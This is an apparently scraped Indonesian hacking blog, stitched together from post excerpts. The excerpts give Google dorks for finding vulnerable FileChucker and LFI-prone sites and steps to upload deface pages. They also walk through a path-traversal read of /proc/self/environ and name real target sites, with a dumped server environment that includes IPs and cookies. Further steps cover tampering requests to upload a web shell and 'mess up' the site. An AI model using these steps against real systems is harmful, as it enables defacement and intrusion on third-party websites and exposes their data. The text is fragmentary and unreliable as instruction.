Assalamualaikum... Menjelang datangnya bulan Ramadhan yang besok akan di laksanakan, sebelumnya saya selaku Admin DH mohon maaf jika ada s...
Exploit FileChucker File Upload Vulnerability
Menjelang datangnya bulan Ramadhan yang besok akan di laksanakan, sebelumnya saya selaku Admin DH mohon maaf jika ada salah dan khilaf yah,, mungkin emang saya sengaja maupun tidak :)
Oke langsung saja disimak yah :) bisa dah sekedar nambahin unique deface di Arsip sobat :D
Dork :
inurl:/cgi-bin/filechucker.cgi
intext:Toptown File Upload
inurl:/cgi-bin/filechucker.pl
intext:File Upload by Encodable
Ayo mulai :) Silahkan sobat mencari target di google dengan menggunakan Dork diatas.
Disini saya sudah menemukan targetnya, yaitu : http://toptown.co.uk/cgi-bin/filechucker.cgi
Kemudian silahkan sobat isi yang perlu diisi filednya :) | atau bisa lihat screenshot saya di bawah ini
Setelah di isi semuax klik Begin Upload.. Nah, tunggu aja hasilnya :)
Note: File yang bisa diupload yaitu .htm, .html, .txt, .jpg, .gif
Dan langsung buka file depesan yg sudah diupload tadi : http://toptown.co.uk/upload/files/ajixcrew.html
Sekian tutorialnya dari saya,, maaf kalo masih acak2an :) yang penting bisa bermanfaat :t
Pagi Sobat DetektifH@cking nie ane share Private SQLi dorks ;), silakan di simak ajah dibawah ini :D inurl:group_concat username 0x3a ...
Private SQLi Dorks
Pagi Sobat DetektifH@cking nie ane share Private SQLi dorks ;), silakan di simak ajah dibawah ini :D
Semoga bermanfaat :t
Assalamualaikum ^_^ Selamat Pagi Sobat DetektetifH@cking, Nice Friday yeah :D ~ Pada kesempatan kali ini saya akan membagikan tutori...
Tutorial Web Hacking ( Local File Inclusion )
- Rokok + Kopi Kapal Api
- Camilan
- Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)
- shell / script file upload ..
- Dork + Kesabaran Dalam Mencari Site Bug LFI , :D
- buka translate.google.com , xixiixixxiixixi :D
- tulis text ente ke google translate yang berkaitan dengan file file di website !! Seperti = Sitemap , contact , daftar , dll ..
- translate text yang sobat tulis ke berbagai bahasa .. misal sitemap , translate ke portugal jadi , mapa
- masu''kan dork sobat ke google : inurl:.php?(*)=mapa.php << ingat Harus ada .php
- Success !! ;)
SERVER_SIGNATURE=
Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35 Server at baleman.co.id Port 80
UNIQUE_ID=Ua6ugso68-wAAF8wsfgAAAAKHTTP_USER_AGENT=Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0SERVER_PORT=80HTTP_HOST=baleman.co.idREDIRECT_HANDLER=application/x-httpd-php5DOCUMENT_ROOT=/home/s2400x14/public_htmlSCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php5REQUEST_URI=/index_1.php?hal=../../../../../../../../../../../proc/self/environSCRIPT_NAME=/cgi-sys/php5HTTP_CONNECTION=keep-alivePATH_INFO=/index_1.phpREMOTE_PORT=18429PATH=/usr/local/bin:/usr/bin:/binPWD=/usr/local/cpanel/cgi-sysSERVER_ADMIN=webmaster@baleman.co.idREDIRECT_STATUS=200REDIRECT_QUERY_STRING=hal=../../../../../../../../../../../proc/self/environHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5PATH_TRANSLATED=/home/s2400x14/public_html/index_1.phpHTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8REMOTE_ADDR=180.253.80.169SHLVL=0SERVER_NAME=baleman.co.idSERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.35QUERY_STRING=hal=../../../../../../../../../../../proc/self/environSERVER_ADDR=202.58.243.17GATEWAY_INTERFACE=CGI/1.1SERVER_PROTOCOL=HTTP/1.1HTTP_ACCEPT_ENCODING=gzip, deflateREDIRECT_URL=/index_1.phpREQUEST_METHOD=GETHTTP_COOKIE=__utma=247167511.668754680.1370401967.1370401967.1370401967.1; __utmb=247167511.1.10.1370401967; __utmc=247167511; __utmz=247167511.1370401967.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Home | Jad
*shell akan keluar di : localhost/[path]/namashell.php
9. Klik Oke .. , Stop Tamper !! Tamper data jangan di close
10.Muncul Sebuah File Upload Di Halaman Site Yang Rentan LFI tersebut
Nih ScreenShotnya : https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash4/424631_391238194318689_1778808128_n.jpg
11.Selanjutnya Upload Shell / Script Deface kamu ^_^
12.Success , Tinggal Diacak acak dalemnya :D
Just Hacking And Have Fun :t
Special Thanks to : Mr.Mx4rz atas kirimannya :)
Malam sobat DetektifH@cking, banyak hacker menemukan masalah besar ketika mereka aka meng-upload shell pada website joomla dan tidak di iz...
Bypass Index Joomla
Pagi sobat DetektifH@cking ane share lagi nhe Program Hacking =D. Nama-nya Joomla Security Scanner v 1.0 ini sangat berguna, jika sobat...
Joomla Security Scanner v 1.0
Screenshot:
Download:
Assalamualaikum wr. wb. malam sobat2 DetektifH@cking .. Kali ini ane akan berbagi Cara Mencari Halaman Web Login , kebanyakan saat melak...
Cara Mencari Halaman Web Login Dengan Acunetix Web Vulnerability Scanner 8
Kali ini ane akan berbagi Cara Mencari Halaman Web Login, kebanyakan saat melakukan eksploitasi web dengan metode SQL Injection, rata rata2 kesulitan menemukan halaman login admin web kan =D, jadi sedikit ane share trik nya yahh.. Okey langsung di simak aja! ;)
Ko' pake Acunetix, iyah ane kadang make untuk melihat struktur dari website tersebut (Crawler) besar kemungkinan dengan fitur crawler kita bisa mendapatkan direktori sensitif dari website target, seperti cgi, admin, dsb. Sedangkan pada tool-tools
Screenshot:
"Berbagi Itu Indah"
Follow Us
Were this world an endless plain, and by sailing eastward we could for ever reach new distances